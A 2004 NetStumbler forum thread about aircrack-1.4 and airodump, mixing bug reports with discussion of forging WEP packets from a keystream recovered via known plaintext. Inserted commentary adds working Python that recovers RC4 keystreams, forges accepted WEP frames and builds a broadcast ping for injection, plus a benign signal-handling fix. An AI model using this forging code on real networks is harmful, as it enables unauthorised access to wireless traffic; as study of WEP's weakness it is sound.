NetStumbler.org Forums
08-25-2004   #91
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

cool ;-)

08-25-2004   #92
devine
Emergence
Join Date: Jul 2004
Location: Paris
Posts: 389

Quote:
Originally Posted by devine
Coming soon: I had fun rewriting airodump, Kismet-style.

btw, I'm also on #aircrack (irc.freenode.net).

08-25-2004   #93
topolb
Registered Member
Join Date: Jun 2004
Posts: 67

Quote:
Originally Posted by KoreK
Well, in theory you can. Working on it. Packet reinjection is quite laborious. Let's see if reality sticks to theory...

PS: b0nk, read the forum rules/FAQ before posting.

Well, you are right. You can insert custom packets if you have the keystream derived from a known-plaintext attack, without knowing the key.

I saw somewhere a tool that implements this.

08-25-2004   #94
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by topolb
Well, you are right. You can insert custom packets if you have the keystream derived from a known-plaintext attack, without knowing the key.

I saw somewhere a tool that implements this.

That could be a good idea to implement it...

08-25-2004   #95
kleptophobiac
Registered Member
Join Date: Sep 2002
Posts: 310

Quote:
Originally Posted by topolb
Well, you are right. You can insert custom packets if you have the keystream derived from a known-plaintext attack, without knowing the key.

I saw somewhere a tool that implements this.

Would having a known set of data go over the network be a big help?

08-25-2004   #96
devine
Emergence
Join Date: Jul 2004
Location: Paris
Posts: 389

Quote:
Originally Posted by sylvain
Did you release aircrack-1.4?

Promises are made to be kept.

http://www.cr0.net:8040/code/network/aircrack-1.4.tgz

08-26-2004   #97
topolb
Registered Member
Join Date: Jun 2004
Posts: 67

Quote:
Originally Posted by kleptophobiac
Would having a known set of data go over the network be a big help?

Of course.

In fact you only need a big known (plaintext) packet to be able to create any custom encrypted packet using the same IV, and without having the key. That is because if you know the plaintext and the ciphertext you can derive the keystream for this specific IV. With this keystream you can encrypt/decrypt anything with this IV.

This way there is no need to crack the key. The only problem is that with only one packet you can only encrypt/decrypt for this IV. For sending packets it is not a problem, as it is the sender who selects the IV. But for decrypting packets you need a known (plaintext) packet for each IV. That's 2^24.

It is not so complicated to obtain this known plaintext. You can for example inject some packet into the WLAN from the Internet (it will be encrypted by the AP), or guess some packet by traffic analysis.

08-26-2004   #98
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by devine

Cool, I'm going to test it right now.

08-26-2004   #99
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by topolb
Of course.

In fact you only need a big known (plaintext) packet to be able to create any custom encrypted packet using the same IV, and without having the key. That is because if you know the plaintext and the ciphertext you can derive the keystream for this specific IV. With this keystream you can encrypt/decrypt anything with this IV.

This way there is no need to crack the key. The only problem is that with only one packet you can only encrypt/decrypt for this IV. For sending packets it is not a problem, as it is the sender who selects the IV. But for decrypting packets you need a known (plaintext) packet for each IV. That's 2^24.

It is not so complicated to obtain this known plaintext. You can for example inject some packet into the WLAN from the Internet (it will be encrypted by the AP), or guess some packet by traffic analysis.

Can we imagine, if we have a big known (plaintext) packet, spoofing the IP/MAC address of the access point and building a crafted, encrypted broadcast ping packet? So that clients will respond to it and generate other encrypted packets...

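The following is an added example, not code from this thread, from aircrack or from any of its authors. It works through what topolb describes in #97 (ciphertext XOR known plaintext gives the RC4 keystream for that IV, which then encrypts anything of the same length under that IV and decrypts nothing under any other IV) and plugs in the payload sylvain proposes in #99, a broadcast ICMP echo request. Everything is a constructed stand-in: the 40-bit key, the IV, the 60-byte "known" packet and the IP addresses are made up, the WEP frame format is reduced to IV || key-id || ciphertext with the clear-text 802.11 MAC header left out (that header is where the AP's address would be spoofed, and it needs no keystream at all), and nothing touches a real interface.

```python
import struct
import zlib

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Legitimate sender: (data || ICV) XOR RC4(iv || key). Returns iv || key-id || ciphertext.
    The 802.11 MAC header carrying the addresses goes in clear and is left out here."""
    plain = data + icv(data)
    return iv + b"\x00" + xor(plain, rc4_keystream(iv + key, len(plain)))

def wep_decrypt(key: bytes, frame: bytes):
    """Receiver (the AP): decrypt and check the ICV. Returns the payload, or None on ICV failure."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data = plain[:-4]
    return data if plain[-4:] == icv(data) else None

def recover_keystream(frame: bytes, known_data: bytes):
    """Attacker: ciphertext XOR known plaintext = the keystream for this IV. No key involved."""
    return frame[:3], xor(frame[4:], known_data + icv(known_data))

def forge_frame(iv: bytes, keystream: bytes, new_data: bytes) -> bytes:
    """Attacker: encrypt chosen data under the same IV. The ICV is just CRC-32 of the chosen
    data, so the AP accepts it. Bounded by how much keystream the known packet yielded."""
    plain = new_data + icv(new_data)
    if len(plain) > len(keystream):
        raise ValueError("payload plus ICV is longer than the recovered keystream")
    return iv + b"\x00" + xor(plain, keystream)

def decrypt_with_keystreams(frame: bytes, keystreams: dict):
    """Attacker: decryption works only for frames whose IV already has a recovered keystream."""
    ks = keystreams.get(frame[:3])
    if ks is None or len(ks) < len(frame) - 4:
        return None
    return xor(frame[4:], ks)[:-4]

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def broadcast_echo_request(src_ip: bytes) -> bytes:
    """LLC/SNAP + IPv4 + ICMP echo request to 255.255.255.255: the payload sylvain proposes
    forging (with the AP's address in the clear MAC header) so that every client answers."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + b"ping"
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     src_ip, b"\xff\xff\xff\xff")
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + ip + icmp

KEY = bytes.fromhex("0102030405")  # constructed 40-bit WEP key; the attacker never learns it
IV = b"\x11\x22\x33"               # IV the victim happened to use for the known packet
KNOWN = b"K" * 60                  # constructed stand-in for a packet whose content is known

def demo() -> dict:
    captured = wep_encrypt(KEY, IV, KNOWN)        # sniffed off the air
    iv, ks = recover_keystream(captured, KNOWN)   # 64 bytes of keystream for this IV
    forged = forge_frame(iv, ks, broadcast_echo_request(bytes([192, 168, 1, 1])))
    other = wep_encrypt(KEY, b"\x44\x55\x66", b"secret")  # victim frame under another IV
    return {
        "forged_accepted": wep_decrypt(KEY, forged),             # the AP decrypts it fine
        "same_iv": decrypt_with_keystreams(captured, {iv: ks}),  # readable: keystream known
        "other_iv": decrypt_with_keystreams(other, {iv: ks}),    # None: no keystream for it
    }

if __name__ == "__main__":
    r = demo()
    print("forged frame accepted by AP:", r["forged_accepted"] is not None)
    print("same IV:", r["same_iv"][:8], "other IV:", r["other_iv"])
```

Two limits fall out of the code. The forged frame can be at most as long as the packet whose plaintext was known, because that is all the keystream there is; and the per-IV dictionary only decrypts traffic under IVs already in it, which is topolb's 2^24 figure. Sending is the easy direction precisely because `forge_frame` picks the IV.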
08-26-2004   #100
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by sylvain
Cool, I'm going to test it right now.

Why is chopper included in aircrack-1.4? How do we have to install it (chopper.sh) and use it?
You should write an INSTALL file ;-)

08-26-2004   #101
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by sylvain
Why is chopper included in aircrack-1.4? How do we have to install it (chopper.sh) and use it?
You should write an INSTALL file ;-)

I found three little bugs in aircrack-1.4:
- The displayed SSID is not always right, as the length of the SSID can be longer than what aircrack displays... you should use a longer length for the variable.

- It seems that only active networks are shown... contrary to Kismet, you don't show previously discovered APs which are not active...

- I could not leave airodump in a proper way.

08-26-2004   #102
devine
Emergence
Join Date: Jul 2004
Location: Paris
Posts: 389

Quote:
Originally Posted by sylvain
Why is chopper included in aircrack-1.4?

The SSID can be longer than what aircrack displays.

It seems that only active networks are shown.

I could not leave airodump in a proper way.

* chopper.sh is actually a channel hopper script you can use together with airodump when wardriving.

* The essid is truncated to 20 characters to fit in an 80-column display. Indeed, when the window size is larger, the full essid (32 bytes) can be displayed. I've added this to my TODO list.

* After 2 min of inactivity, the discovered APs are hidden; this feature is especially helpful when wardriving. Note that when you exit airodump, it saves the complete list of detected Access Points in CSV format.

* airodump detects when the user presses Ctrl-C and exits gracefully.

08-26-2004   #103
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by devine
* chopper.sh is actually a channel hopper script you can use together with airodump when wardriving.

* The essid is truncated to 20 characters to fit in an 80-column display. Indeed, when the window size is larger, the full essid (32 bytes) can be displayed. I've added this to my TODO list.

* After 2 min of inactivity, the discovered APs are hidden; this feature is especially helpful when wardriving. Note that when you exit airodump, it saves the complete list of detected Access Points in CSV format.

* airodump detects when the user presses Ctrl-C and exits gracefully.

Hmm, I did a Ctrl-C and airodump did not exit... I had to close my terminal window. Otherwise, when I exited, I only had a pcap file created and no CSV file...

08-26-2004   #104
devine
Emergence
Join Date: Jul 2004
Location: Paris
Posts: 389

Quote:
Originally Posted by sylvain
Hmm, I did a Ctrl-C and airodump did not exit... I had to close my terminal window. Otherwise, when I exited, I only had a pcap file created and no CSV file...

Right, this almost certainly happened because airodump was waiting for a packet in read(), thus not checking the do_exit flag; I'll put back the select() call so as to check do_exit regularly. Thanks for reporting this bug.

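An added example of the bug devine diagnoses and the fix he describes, written in Python rather than airodump's C and not taken from aircrack: a SIGINT handler that only sets a flag is useless while the capture loop sits inside a blocking read() on a quiet interface, so the loop has to wait in select() with a timeout and re-test the flag each time it wakes. The monitor-mode socket is replaced by a pipe, the frame bytes are made up, and in `simulate()` the Ctrl-C is simulated by a timer thread calling the handler directly (no real signal is delivered); `install_handler()` is the real hookup for interactive use. POSIX only, since select() on a pipe is assumed.

```python
import os
import select
import signal
import threading
import time

do_exit = False  # airodump's flag: set from the SIGINT handler, read by the capture loop

def handle_sigint(signum=signal.SIGINT, frame=None):
    """The handler does nothing but raise the flag; the capture loop must notice it."""
    global do_exit
    do_exit = True

def install_handler():
    signal.signal(signal.SIGINT, handle_sigint)

def capture_loop_blocking(fd):
    """The pattern that hangs: os.read() blocks until a frame arrives, so on a quiet interface the
    flag is never re-checked. Python even retries read() after EINTR on its own (PEP 475), as
    glibc's signal() does for C, so the keypress does not break the call either."""
    frames = []
    while not do_exit:
        buf = os.read(fd, 4096)
        if not buf:
            break
        frames.append(buf)
    return frames

def capture_loop_select(fd, tick=0.2):
    """The fix: block in select() for at most `tick` seconds, then re-test do_exit before reading."""
    frames = []
    while not do_exit:
        readable, _, _ = select.select([fd], [], [], tick)
        if not readable:
            continue          # timed out with no data: go round and look at the flag
        buf = os.read(fd, 4096)
        if not buf:
            break             # EOF on the descriptor
        frames.append(buf)
    return frames

def simulate(quiet: bool):
    """Stand-in for the monitor-mode socket: a pipe. quiet=True reproduces sylvain's report
    (no traffic at all, Ctrl-C 0.15 s later). Returns (frames read, seconds spent in the loop)."""
    global do_exit
    do_exit = False
    r, w = os.pipe()
    if quiet:
        threading.Timer(0.15, handle_sigint).start()   # simulated Ctrl-C; no real signal sent
    else:
        os.write(w, b"frame-1")                         # constructed frame bytes
        os.write(w, b"frame-2")
        os.close(w)
    t0 = time.monotonic()
    frames = capture_loop_select(r, tick=0.05)
    elapsed = time.monotonic() - t0
    os.close(r)
    if quiet:
        os.close(w)
    return frames, elapsed

if __name__ == "__main__":
    install_handler()
    print("quiet interface, Ctrl-C after 0.15 s:", simulate(quiet=True))
    print("busy interface, writer closes:", simulate(quiet=False))
```

Swapping `capture_loop_select` for `capture_loop_blocking` in `simulate(quiet=True)` is the original bug: the timer raises the flag, but the loop never returns from read(), which is why the CSV written at exit never appeared. Installing the handler with sigaction() and without SA_RESTART would also make read() fail with EINTR, but the select() timeout does not depend on how the signal was installed or on whether the driver restarts the call.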
08-26-2004   #105
sylvain
Wireless Auditor
Join Date: Jun 2004
Location: Paris, France
Posts: 175

Quote:
Originally Posted by sylvain
Can we imagine, if we have a big known (plaintext) packet, spoofing the IP/MAC address of the access point and building a crafted, encrypted broadcast ping packet? So that clients will respond to it and generate other encrypted packets...

And what do you think of what I said earlier, devine?

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.